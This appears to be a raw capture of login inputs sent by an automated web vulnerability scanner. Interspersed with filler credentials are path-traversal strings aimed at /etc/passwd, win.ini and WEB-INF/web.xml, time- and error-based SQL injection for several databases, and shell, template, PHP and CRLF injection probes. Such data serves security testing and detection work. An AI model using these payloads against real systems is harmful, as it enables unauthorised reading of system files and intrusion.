admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
admi1: |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:..\..\..\..\..\..\windows/win.ini 1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:.\..\..\..\..\..\..\windows/win.ini |
admi1:..\..\..\..\..\..\windows/win.ini |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216windows/win%u002eini |
admi1:%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini 1 |
admi1:1 |
admi1:1 |
admi1:.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini |
admi1:..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini |
admi1:%u2215etc%u2215passwd |
admi1:1 |
admi1:1 |
admi1:%2fetc%2fpasswd |
admi1:/etc/passwd 1 |
admi1:/etc/passwd |
admi1:1 |
admi1:%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd |
admi1:%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd |
admi1:./../../../../../../etc/passwd |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:../../../../../../etc/passwd 1 |
admi1:../../../../../../etc/passwd |
admi1:1 |
admi1:%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd |
admi1:1 |
admi1:%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd |
admi1:./../../../../../../../../../../../../../../../../../../etc/passwd |
admi1:../../../../../../../../../../../../../../../../../../etc/passwd 1 |
admi1:../../../../../../../../../../../../../../../../../../etc/passwd |
../../../../WEB-INF/web.xml;admi1:1 |
../../../../WEB-INF/web.xml:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
../../../WEB-INF/web.xml;admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
../../../WEB-INF/web.xml:1 |
../../WEB-INF/web.xml;admi1:1 |
../../WEB-INF/web.xml:1 |
../WEB-INF/web.xml;admi1:1 |
../WEB-INF/web.xml:1 |
admi1:1 |
WEB-INF/web.xml;admi1:1 |
WEB-INF/web.xml:1 |
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u:1 |
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2:1 |
../../../../../../Windows/win.ini admi1:1 |
./../../../../../../Windows/win.ini:1 |
../../../../../../Windows/win.ini:1 |
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u:1 |
admi1:1 |
admi1:1 |
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
../../../../../../../../../../../../../../../../..:1 |
./../../../../../../../../../../../../../../../../:1 |
../../../../../../../../../../../../../../../../..:1 |
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u:1 |
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g |
admi1:1 |
..\..\..\..\..\..\Windows\win.ini admi1:1 |
.\..\..\..\..\..\..\Windows\win.ini:1 |
..\..\..\..\..\..\Windows\win.ini:1 |
admi1:1 |
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u:1 |
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2:1 |
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..:1 |
admi1:1 |
.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\:1 |
admi1:1/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('z',2) |
admi1:1/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('n',0) |
admi1:1'and(select+1)>0waitfor/**/delay'0:0:2 |
admi1:1'and(select+1)>0waitfor/**/delay'0:0:0 |
admi1:1/**/and(select+1)>0waitfor/**/delay'0:0:3'/**/ |
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..:1 |
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u:1 |
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2:1 |
admi1:1 |
admi1:1/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/ |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/ |
admi1:1 |
../../../../../../windows/win.ini admi1:1 |
admi1:1 |
admi1:1'/**/and(select'1'from/**/pg_sleep(2))::text>'0 |
admi1:1 |
admi1:1 |
admi1:1'/**/and(select'1'from/**/pg_sleep(0))::text>'0 |
admi1:1/**/and(select+1/**/from/**/pg_sleep(3))>0/**/ |
admi1:1 |
admi1:1 |
admi1:1 |
./../../../../../../windows/win.ini:1 |
admi1:1 |
admi1:1 |
admi1:1/**/and(select+1/**/from/**/pg_sleep(2))>0/**/ |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1/**/and(select+1/**/from/**/pg_sleep(0))>0/**/ |
admi1:1"and(select*from(select+sleep(2))a/**/union/**/select+1)=" |
admi1:1"and(select*from(select+sleep(0))a/**/union/**/select+1)=" |
../../../../../../windows/win.ini:1 |
admi1:1'and(select*from(select+sleep(0))a/**/union/**/select+1)=' |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:(select*from(select+sleep(2)union/**/select+1)a) |
admi1:1 |
admi1:(select*from(select+sleep(0)union/**/select+1)a) |
admi1:1"and"h"="z |
admi1:1"and"u"="u |
admi1:1'and'c'='q |
admi1:1'and'i'='i |
admi1:1/**/and+1=6 |
admi1:1 |
admi1:1/**/and+4=4 |
admi1:1 |
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u:1 |
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2:1 |
admi1:1 |
admi1'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('u',3)=:1 |
admi1'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('p',2)=:1 |
../../../../../../../../../../../../../../../../..:1 |
admi1:1 |
admi1'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('y',0)=:1 |
expr 912843623 + 895861032:1 |
./../../../../../../../../../../../../../../../../:1 |
../../../../../../../../../../../../../../../../..:1 |
admi1'and(select+1)>0waitfor/**/delay'0:0:0:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u:1 |
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2:1 |
..\..\..\..\..\..\windows/win.ini admi1:1 |
admi1&set /A 996730157+869758916:1 |
.\..\..\..\..\..\..\windows/win.ini:1 |
..\..\..\..\..\..\windows/win.ini:1 |
admi1:1 |
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u:1 |
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2:1 |
admi1$(expr 922638843 + 842789891):1 |
admi1|expr 917072466 + 990757249:1 |
admi1'/**/and(select'1'from/**/pg_sleep(0))::text>:1 |
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..:1 |
.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\:1 |
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1'"\( |
admi1:1鎈'"\( |
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u:1 |
admi1:1'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1284212191')))>'0 |
admi1:convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1592848287'))) |
admi1:1/**/and/**/cast(md5('1631620255')as/**/int)>0 |
admi1:1'and(select'1'from/**/cast(md5(1452641325)as/**/int))>'0 |
admi1:extractvalue(1,concat(char(126),md5(1411271511))) |
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2:1 |
../../../../../../windows/win.ini admi1:1 |
./../../../../../../windows/win.ini:1 |
admi1"and(select*from(select+sleep(3))a/**/union/*:1 |
admi1
expr 812628904 + 998789538:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1"and/**/extractvalue(1,concat(char(126),md5(1930677773)))and" |
admi1:1 |
admi1:1 |
admi1:1 |
admi1"and(select*from(select+sleep(2))a/**/union/*:1 |
admi1:1'and/**/extractvalue(1,concat(char(126),md5(1145431104)))and' |
admi1:1 |
admi1'"\(:1 |
admi1:1 |
admi1:1 |
../../../../../../windows/win.ini:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1"and(select*from(select+sleep(0))a/**/union/*:1 |
admi1:1 |
admi1'and(select*from(select+sleep(2))a/**/union/*:1 |
admi1鎈'"\(:1 |
admi1:1 |
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u:1 |
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2:1 |
admi1'and/**/convert(int,sys.fn_sqlvarbasetostr(Ha:1 |
admi1:1 |
../../../../../../../../../../../../../../../../..:1 |
admi1:1 |
admi1:1 |
admi1'and(select*from(select+sleep(0))a/**/union/*:1 |
admi1"and"v"="g:1 |
./../../../../../../../../../../../../../../../../:1 |
admi1"and"f"="f:1 |
../../../../../../../../../../../../../../../../..:1 |
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u:1 |
admi1:1 |
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2:1 |
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5':1 |
..\..\..\..\..\..\windows/win.ini admi1:1 |
.\..\..\..\..\..\..\windows/win.ini:1 |
..\..\..\..\..\..\windows/win.ini:1 |
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u:1 |
admi1'and'a'='g:1 |
admi1/**/and/**/cast(md5('1826466577')as/**/int)>0:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1'and(select'1'from/**/cast(md5(1811998348)as/:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
extractvalue(1,concat(char(126),md5(1712103697))):1 |
admi1:1 |
admi1"and/**/extractvalue(1,concat(char(126),md5(1:1 |
admi1'and'k'='k:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:<%- 953046825+809086177 %> |
admi1'and/**/extractvalue(1,concat(char(126),md5(1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:#set($c=985675657+965870933)${c}$c |
admi1:${(886632114+844153621)?c} |
admi1:1 |
admi1:1 |
admi1:${947719374+807366292} |
admi1:/*1*/{{923854471+872018072}} |
<%- 901705257+921297918 %>:1 |
admi1:1 |
#set($c=823221040+825609120)${c}$c:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
${(929393030+992510473)?c}:1 |
${986092622+823797566}:1 |
admi1:1 |
/*1*/{{982739494+820669853}}:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1\r\nCRLF-Header:CRLF-Value |
admi1:1 |
admi1:1%0d%0aCRLF-Header:CRLF-Value |
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2:1 |
admi1:1
CRLF-Header:CRLF-Value |
admi1:1 |
admi1:1 |
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:'+(40810*41427)+' |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:'-var_dump(md5(187874105))-' |
admi1:${@var_dump(md5(858227788))}; |
admi1:1 |
.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\:1 |
'+(44460*41519)+':1 |
admi1:expr 872168685 + 907043791 |
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
'-var_dump(md5(159862396))-':1 |
admi1:1 |
admi1:1 |
${985310466+955144498}:1 |
%u2215etc%u2215passwd:1 |
%2fetc%2fpasswd:1 |
admi1:1 |
admi1:1 |
admi1:1 |
/etc/passwd admi1:1 |
admi1:1 |
/etc/passwd:1 |
admi1:1&set /A 959174526+820764359 |
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u:1 |
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2:1 |
./../../../../../../etc/passwd:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
../../../../../../etc/passwd admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
../../../../../../etc/passwd:1 |
admi1:1 |
admi1:1 |
admi1:1 |
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u:1 |
admi1:1$(expr 971234340 + 844520578) |
admi1:1|expr 894165456 + 875629180 |
admi1:1 |
admi1:gvdtberoosjazmqftxig |
gvdtberoosjazmqftxig:1 |
admi1:1 |
admi1:1 |
admi1:1
expr 831133450 + 952309388 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2:1 |
./../../../../../../../../../../../../../../../../:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:${804264831+809111518} |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
${@var_dump(md5(557591856))};:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
../../../../../../../../../../../../../../../../..:1 |
../../../../../../../../../../../../../../../../..:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admi1:1 |
admin'/**/and(select'1'from/**/pg_sleep(0))>'0:12345678 |
admin"and(select*from(select+sleep(8))a/**/union/*:12345678 |
admin"and(select*from(select+sleep(0))a/**/union/*:12345678 |
admin'and(select*from(select+sleep(8))a/**/union/*:12345678 |
admin'and(select*from(select+sleep(0))a/**/union/*:12345678 |
admin"and"s"="u:12345678 |
admin"and"f"="f:12345678 |
admin'and'x'='s:12345678 |
admin'and'b'='b:12345678 |
admin'"\(:12345678 |
admin鎈'"\(:12345678 |
admin'and/**/convert(int,sys.fn_sqlvarbasetostr(Ha:12345678 |
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5':12345678 |
admin/**/and/**/cast(md5('1575293099')as/**/int)>0:12345678 |
admin'and(select'1'from/**/cast(md5(1699015549)as/:12345678 |
extractvalue(1,concat(char(126),md5(1552852871))):12345678 |
admin"and/**/extractvalue(1,concat(char(126),md5(1:12345678 |
admin'and/**/extractvalue(1,concat(char(126),md5(1:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('o',8)='o |
admin:12345678'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('x',0)='x |
admin:12345678/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('s',8) |
admin:12345678/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('r',0) |
admin:12345678'and(select+1)>0waitfor/**/delay'0:0:8 |
admin:12345678'and(select+1)>0waitfor/**/delay'0:0:0 |
admin:12345678/**/and(select+1)>0waitfor/**/delay'0:0:8'/**/ |
admin:12345678/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/ |
admin:12345678'/**/and(select'1'from/**/pg_sleep(8))>'0 |
admin:12345678'/**/and(select'1'from/**/pg_sleep(0))>'0 |
admin:12345678/**/and(select+1/**/from/**/pg_sleep(8))>0/**/ |
admin:12345678/**/and(select+1/**/from/**/pg_sleep(0))>0/**/ |
admin:12345678"and(select*from(select+sleep(8))a/**/union/**/select+1)=" |
admin:12345678"and(select*from(select+sleep(0))a/**/union/**/select+1)=" |
admin:12345678'and(select*from(select+sleep(8))a/**/union/**/select+1)=' |
admin:12345678'and(select*from(select+sleep(0))a/**/union/**/select+1)=' |
admin:(select*from(select+sleep(8)union/**/select+1)a) |
admin:(select*from(select+sleep(0)union/**/select+1)a) |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678"and"h"="n |
admin:12345678"and"t"="t |
admin:12345678'and'n'='q |
admin:12345678'and'm'='m |
admin:12345678/**/and+1=5 |
admin:12345678/**/and+2=2 |
admin:12345678'"\( |
admin:12345678鎈'"\( |
admin:12345678'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1659631370')))>'0 |
admin:convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1533814738'))) |
admin:12345678/**/and/**/cast(md5('1748215745')as/**/int)>0 |
admin:12345678'and(select'1'from/**/cast(md5(1595908623)as/**/int))>'0 |
admin:extractvalue(1,concat(char(126),md5(1686782322))) |
admin:12345678"and/**/extractvalue(1,concat(char(126),md5(1191439196)))and" |
admin:12345678'and/**/extractvalue(1,concat(char(126),md5(1161651658)))and' |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:kytgqbamfxsiupfbzgnr |
kytgqbamfxsiupfbzgnr:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('k',4)='k |
admin:12345678'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('m',0)='m |
admin:12345678/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('g',4) |
admin:12345678/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('x',0) |
admin:12345678'and(select+1)>0waitfor/**/delay'0:0:4 |
admin:12345678'and(select+1)>0waitfor/**/delay'0:0:0 |
admin:12345678/**/and(select+1)>0waitfor/**/delay'0:0:4'/**/ |
admin:12345678/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/ |
admin:12345678'/**/and(select'1'from/**/pg_sleep(4))>'0 |
admin:12345678'/**/and(select'1'from/**/pg_sleep(0))>'0 |
admin:12345678/**/and(select+1/**/from/**/pg_sleep(4))>0/**/ |
admin:12345678/**/and(select+1/**/from/**/pg_sleep(0))>0/**/ |
admin:12345678"and(select*from(select+sleep(4))a/**/union/**/select+1)=" |
admin:12345678"and(select*from(select+sleep(0))a/**/union/**/select+1)=" |
admin:12345678'and(select*from(select+sleep(4))a/**/union/**/select+1)=' |
admin:12345678'and(select*from(select+sleep(0))a/**/union/**/select+1)=' |
admin:(select*from(select+sleep(4)union/**/select+1)a) |
admin:(select*from(select+sleep(0)union/**/select+1)a) |
admin:12345678"and"t"="y |
admin:12345678"and"e"="e |
admin:12345678'and'f'='z |
admin:12345678'and'k'='k |
admin:12345678/**/and+3=7 |
admin:12345678/**/and+3=3 |
admin:12345678'"\( |
admin:12345678鎈'"\( |
admin:12345678'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1433739234')))>'0 |
admin:convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1109882347'))) |
admin:12345678/**/and/**/cast(md5('1005468411')as/**/int)>0 |
admin:12345678'and(select'1'from/**/cast(md5(1442535153)as/**/int))>'0 |
admin:extractvalue(1,concat(char(126),md5(1893818978))) |
admin:12345678"and/**/extractvalue(1,concat(char(126),md5(1992617327)))and" |
admin:12345678'and/**/extractvalue(1,concat(char(126),md5(1470036608)))and' |
admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('i',4)=:12345678 |
admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('m',0)=:12345678 |
admin'and(select+1)>0waitfor/**/delay'0:0:4:12345678 |
admin'and(select+1)>0waitfor/**/delay'0:0:0:12345678 |
